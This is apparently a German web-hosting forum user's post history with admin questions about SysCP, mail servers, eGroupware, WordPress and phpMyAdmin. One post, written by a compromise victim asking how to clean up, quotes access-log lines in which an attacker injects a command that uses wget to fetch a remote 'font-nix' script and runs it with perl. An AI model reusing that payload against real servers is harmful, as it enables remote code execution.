Posts by Firefly

    Hallo,


    weiss jemand, wie ich auf (m)einem vServer über SysCP einen FTP-Zugang anlegen kann, der nur/ausschließlich Zugriff auf einen Ordner X über dem Webroot erhalten soll?


    Das wäre spitzenmäßig...


    Thx firefly


    PS: es gibt beim Anlegen eines FTP-Accounts ja ein Feld für den Pfad, wo man einen Ordner angeben kann. Wenn ich das mache, dann erstellt SysCP angeblich einen Ordner, wenn dieser nicht vorhanden ist. Hat er bei mir aber nicht (evtl. ist der Cron nur einmal täglich...?). Der Login über den neuen Account funktioniert aber selbst wenn der Ordner noch nicht erstellt wurde, bloss wo bin ich dann? Es müsste ja ein Unterordner des Web(Kunden-)Root sein, aber ich finde es einfach nicht.... Kann mir da vll. jemand auf die Sprünge helfen? ....30 Mins und es ist alles wie es sein soll - es war der Cron...

    also aktuell kann ich weder mails empfangen noch versenden und es ist entgegen meinem anfänglichen Statement nicht auf felamimail beschränkt.


    im Error-Log (mail.err) erscheint seit dem Node-Restart immer wieder folgende Meldung:


    Code
    Nov  5 11:18:58 v2xxxxxxxx postfix/trivial-rewrite[20415]: fatal: mysql:/etc/postfix/mysql-virtual_mailbox_domains.cf(0,lock|fold_fix): table lookup problem
    ...
    Nov  7 14:03:41 v2xxxxxxxx postfix/trivial-rewrite[21277]: fatal: mysql:/etc/postfix/mysql-virtual_mailbox_domains.cf(0,lock|fold_fix): table lookup problem


    Hier noch ein Ausschnitt aus dem Mail-Log (mail.log):


    hmm

    Nachdem netcup wg. des kritischen Kernel-Bugs meinen vServer aktualisiert hatte funktioniert aus irgend einem Grund das Versenden von eMails via eGroupware (felamimail) nicht mehr.


    Was könnte sich denn alles durch das Update verändert haben?



    Danke & Gruß
    firefly

    FYI,


    habe gerade einem Kumpel Wordpress auf seinem Netcup-Webspace eingerichtet und dabei ist mir aufgefallen, dass dort die phpmyadmin-Version noch nicht geupdated wurde (2.9.1.1-Debian-9).


    D.h. Nix Gutes, oder ist der Webspace nicht in gleicher Weise angreifbar wie mein vServer?

    Quote from Ede;4738

    Unter /etc/apache2/conf.d/phpmyadmin.conf findet man übrigens die Konfigurationsdatei von PMA für den Apache.


    Ja, die Datei hab ich auch gesucht - es gibt sie aber bei mir nicht - wohl ein Unterschied zwischen Etch und Lenny. Der Alias ist auch nicht innerhalb einer Datei definiert, so dass ich es letztendlich über die Umbenennung innerhalb von /var/www/ hinbekommen habe. In welcher Konfig-Datei ich den Alias hätte reinstellen sollen habe ich für meine Etch/PMA-Kombo einfach nicht herausbekommen...


    Jetzt ist allerdings der PMA-Ordner im /usr/share-Ordner verschwunden. Wäre toll, wenn ich irgendwo sehen könnte, wie die Symlink-Struktur von PMA funktioniert und welche Dateien ich eigentlich ändern soll/darf.


    @Servidor: An den Anfang dieser htaccess-Datei hab ich die auth-Infos reingestellt (

    Apache Configuration
    AuthType Basic
    AuthName "Datenbankadministration"
    AuthUserFile /var/kunden/webs/.htusers
    Require  valid-user

    , aber es greift nicht. Den Server muss ich doch dafür nicht restarten, oder? Den Apache zu restarten hat auch nix gebracht, komisch war dabei, dass es jetzt nur noch mit einem Parameter geht (/etc/init.d/apache2 -k restart). Ist das seit dem letzten Paketupdate prinzipiell so, oder hab ich da auch einen Wurm drin?


    Vielen Dank für den Input! firefly

    So,


    das aufgespielte Backup war sauber und nach einem PMA-Update auf 2.9.1.1-Debian-11 sollte das nicht genauso wieder passieren können (hoffe ich).


    Über Umbenennen von /var/www/phpmyadmin in /var/www/wasanderes findet auch nicht mehr jeder die PMA-Installation über den Browser.


    Mit dem htaccess-Schutz ist das aber so eine Sache. Unter /etc/phpmyadmin gibt es eine htaccess-Datei (ohne Punkt davor) die folgendermassen ausschaut:


    Unter /var/www/phpmyadmin (inzwischen /var/www/wasanderes) gibt es eine .htaccess-Datei mit identischem Inhalt (Symlink?). Wo/wie soll denn da eine Authentifizierung rein?


    Danke, firefly


    PS: Es scheint ungefähr ein halbes Dutzend unterschiedliche PMA-Config-Fileversionen zu geben, und meine ist besonders schlecht dokumentiert :confused:

    Angezeigt wird '2.9.1.1-Debian-9', was auch nicht der ursprünglich installierten Version entspricht.


    Danke für den Hinweis!


    Update: Eventuell basiert der Angriff auf Schwachstellen, die hier beschrieben werden.

    Hallo zusammen,


    vielen Dank schon einmal an alle für die Informationen & Vorschläge!


    Besonders interessant wäre es noch zu erfahren,


    1. wie ich sicher erfahren kann, ob tatsächlich Daten (Passwörter etc. - Debian Etch) kompromittiert wurden,
    2. wie es der Angreifer geschafft hat, den Zugang zu phpmyadmin zu verhindern/zu zerstören
    3. ob die vom letzten Poster (Ede) vorgeschlagenen Maßnahmen genügen, um Apache / SysCP / phpmyadmin gegen diese Art von Angriff abzusichern
    4. ob ein Managed Server gegen diese Art von Intrusion 'immun' ist bzw. wie ein solcher Angriff gehandled wird - ich denke nämlich gerade über ein Upgrade nach...


    Leider bin ich für eine anleitungsfreie Diagnose dieses eher wenig dokumentierten Eindringlings nicht firm genug & daher für jeden weiteren Input dankbar!


    Gruß,
    firefly


    PS: Der Stop des Webservers schaut eher nach einem falsch konfigurierten logrotate-cronjob aus...

    ok,


    das würde ich gerne als letztes Mittel machen. Es ist doch schon eine Menge Konfigurationszeit reingeflossen und evtl. kann man die Intrusion isolieren und ohne Komplettneuaufsetzen unschädlich machen?


    Wobei ich auch nicht mehr in phpmyadmin reinkomme ("Ungültiger Host-Name für Server 1. Bitte überprüfen Sie Ihre Konfiguration.")


    Für den Apache-Shutdown könnte auch folgendes verantwortlich sein (root mail):


    Ansonsten hat es vor kurzem einen ähnlichen Angriff auf einen Debian-Server gegeben: http://forums.debian.net/viewtopic.php?f=5&t=41559


    aso, und im accesslog hat es direkt vor den vom error.log aufgezeichneten einträgen folgendes gegeben:

    Code
    85.214.71.129 - - [02/Aug/2009:02:12:50 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix  HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    85.214.71.129 - - [02/Aug/2009:02:12:50 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix  HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    85.214.71.129 - - [02/Aug/2009:02:12:50 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix  HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    85.214.71.129 - - [02/Aug/2009:02:12:51 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix  HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    85.214.71.129 - - [02/Aug/2009:02:12:51 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix  HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    85.214.71.129 - - [02/Aug/2009:02:12:51 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix  HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


    weiß vielleicht einer, was für eine Art von Angriff hier gefahren wurde, wie man sich dagegen immunisieren kann? Auch damit es nach dem neuaufsetzen nicht gleich wieder vom gleichen gerooted (ist nicht klar) wird?


    diese wget-versuche sind wohl ein Anzeichen für einen modifizierten iranischen Hack, der shellbot kommt aus singapur und die hackdateien selbst liegen auf einem Cronon-Server...


    Naja, also für Tipps aller art bin ich dankbar, ansonsten werde ich wohl um ein neuaufsetzen nicht drumrumkommen.


    firefly


    PS: wenn ich ein backup von vor zwei wochen einspiele müsste das doch erst einmal ungecrackt sein oder? würde mich ein managed server vor solchen überfällen sicher schützen?

    Hallo zusammen,
    mein Apache hatte sich gestern 'selbstständig' verabschiedet. Restart hat normal funktioniert, allerdings hat es wohl eine Attacke gegeben:
    Im error.log finde ich folgende Zeilen:



    Es werden dann noch ein paar weitere font-nix(.1,.2,.3,.4,.5) angelegt.


    Das log endet mit:


    Das schaut alles andere als gut aus. Vor allem wenn man sich die Dateien anschaut, die abgelegt wurden. Irgendwelche spanischsprechenden Hacker oder so.


    Was ist denn jetzt die richtige Vorgehensweise um aufzuräumen und die Schwachstelle zu finden?


    Danke & Gruß,
    Firefly

    jetzt habe ich über SySCP ein neues E-Mail-Konto angelegt auf meinedomain.de. Wenn ich das jetzt in Mozilla als IMAP-Konto eintrage, dann funktionert der Login nicht, bei POP3 schon... courier-imap ist aber installiert und macht brav auf Port 143 Meldung...


    Gibt es da vielleicht unterschiedliche Eintragungen zu tätigen bei POP3 und IMAP, so was wie meinedomain.de vs. mail.meinedomain.de als Mailhost?


    hmm, ich lese überall nur, dass es automatisch geht, aber irgendwo hängt es bei mir noch ...


    Wo kann ich denn überprüfen, ob die über SysCP generierten E-Mail-Accounts / -Benutzer auch für den IMAP-Server Gültigkeit haben? Da müsste es doch auch so einen Authentifizierungsagenten geben, oder?


    Evtl. muss ich die Domain in SySCP neu aufsetzen, damit der IMAP-Server mit den E-Mail-Account-Daten versorgt wird...?
    ------
    hmm, jetzt geht es, wobei ich gegenüber gestern eigentlich nichts geändert habe ...?!

    jupp,
    es funktioniert auch schon so einiges - nur dass sich den egroupware-webmailer nicht mit courier-imap verbinden kann nervt noch. Bin da auch nicht ganz schlüssig, weil ich imap vorher nie im Einsatz hatte.

    also bei der Einrichtung von egroupware, dass nur mit imap funktioniert, muss ich folgende 'Standard Mailserver Einstellungen' eintragen:
    ------------
    POP/IMAP Mail Server Hostname oder IP Adresse: localhost
    Mail Server Protokol: IMAP (oder IMAPS)
    Mail Server Login Typ: Virtual Mail Manager (Loginname enthalten Domain) oder (Standard (Loginname identisch zu eGroupWare Benutzername))
    Mail Domain (für Virtual Mail Manager): meinedomain.de
    SMTP Server Hostname oder IP Adresse: localhost
    SMTP Server Port:
    Benutzer für SMTP-Authentifizierung (leer lassen wenn keine notwendig ist):
    Passwort für SMTP Authentifizierung:
    -------------
    so hab ich es momentan ausgefüllt (mit meiner domain). fällt da irgendetwas auf, was vll. anders gehört?


    Könnte es evtl. Probleme machen, dass meinedomain.de nicht auf die Haupt-Server-IP zeigt, sondern auf eine Zusatz-IP?


    Bin für alle Hinweise dankbar!


    firefly

    Hallo mal wieder,


    für eGroupware, was ich gerade auf dem vServer installiere, benötige ich IMAP, was noch nicht so recht will. POP3 funktioniert anstandslos.


    Gibt es denn eine Möglichkeit, den IMAP-Server zu testen / zu konfigurieren? (Debian Etch/ SySCP 1.4.2)

    Hallo zusammen,


    gibt es etwas Spezielles zu beachten, wenn ich egroupware(.org) auf meinem vServer (Debian) installieren & einsetzen möchte?


    Sollte ich da z.B. vorab irgendwelche Pakete installieren oder Configs überprüfen?


    Grüße,
    firefly


    edit: falls es jemandem hilft, hier ein hübsches howto: eGroupWare auf Debian SysCP

    ja,


    genau die meinte ich - wpmu mit virtualisierten subdomains, das ist dann wohl der richtige Ausdruck.


    Und, OBD ist dafür wohl nicht unbedingt notwendig, oder?

    hmm,


    also eigentlich hoste ich alles selber - manche Wordpress-Versionen erlauben aber ziemlich weitreichende Manipulationen bis hinunter auf die Domain-Ebene (z.B. können Subdomains bei entsprechenden Servereinstellungen von Wordpress-Admins oder sogar -Nutzern erstellt werden).


    Wie kann ich denn OBD pro Domain unter SysCP (1.4.2) deaktivieren?


    Oder ist es nicht doch möglich, den Server sauber mit ODB und Wordpress aufzusetzen?


    Grüße,
    Firefly

    Danke für die schnelle Antwort!


    Genau so habe ich letztens Wordpress auch zum Laufen gebracht, aber leider geht dieser Workaround in diesem Fall nicht, da die Wordpress-Installation im Root sitzen muss, um bestimmte Zusatz-Funktionalitäten zu ermöglichen.


    Gerade habe ich die Warnungen mit

    Quote

    php_admin_value open_basedir none

    in der httpd.conf für das Kundendirectory umgangen, so dass es jetzt ganz ohne open_basedir läuft, aber ich denke, das wäre schon eine gröbere Sicherheitslücke auf Dauer, oder?

    Hallo zusammen,


    auf meinem vServer habe ich immer wieder Probleme mit open_basedir und Wordpress-Installationen.


    Die Warnungen schauen (u.a.) folgendermaßen aus:


    1.

    Quote

    Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/var/kunden/webs/wp-config.php) is not within the allowed path(s): (/var/kunden/webs/kunde1/:/tmp/) in /var/kunden/webs/kunde1/wp-blog-header.php on line 9

    2.

    Quote

    Warning: is_writeable() [function.is-writeable]: open_basedir restriction in effect. File(/var/kunden/webs/kunde1) is not within the allowed path(s): (/var/kunden/webs/kunde1/:/tmp/) in /var/kunden/webs/kunde1/index-install.php on line 280

    Man sieht schon, dass da was im Argen ist, wenn bei 1. versucht wird in eine Verzeichnisebene über der DocumentRoot des Kunden zu schreiben, aber trotzdem: ich scheine der Einzige zu sein, bei dem das so ist, daher denke ich, es müsste an meinen Server-Einstellungen liegen.


    Bei 2. vermute ich mal, dass es was mit dem fehlenden / hinter kunde1 zu tun hat.


    Meine Server-Einstellungen:


    php.ini:

    Quote

    ;open_basedir =

    (also auskommentiert)


    99_syscp_vhosts.conf:

    bin mir nicht sicher, ob hier die youserver.net-Einträge etwas ausmachen...


    unter httpd.conf noch:

    Wo könnte ich denn ansetzen um dieses Problem, das bei allen meinen syscp-Kunden auftaucht, aus der Welt zu schaffen?


    Danke für alle Tipps,
    firefly